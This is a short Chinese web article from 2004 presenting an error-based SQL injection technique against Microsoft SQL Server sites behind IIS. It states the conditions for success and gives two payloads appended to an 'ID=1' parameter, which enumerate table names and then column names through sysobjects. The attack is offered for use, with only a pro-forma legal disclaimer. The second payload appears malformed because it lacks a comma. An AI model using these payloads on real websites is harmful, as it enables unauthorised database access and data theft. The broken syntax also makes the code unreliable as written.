频道栏目
首页 > 安全 > 网站安全 > 正文

SQLSERVER注入必殺技

2004-10-06 08:20:25           
收藏   我要投稿

SQLSERVER注入必殺技
必殺技成功條件:
1.找到注入點
2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示

注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。

[N] = 第N個表
ID=1 and (Select top 1 name from(Select top [N] idname from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名
[N] = 第N個字段
ID=1 and (Select Top 1 col_name(object_id([T])[N]) from sysobjects)>1

相关TAG标签
上一篇:构建和配置更安全的网站
下一篇:SQL注入80004005及其它错误消息分析
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站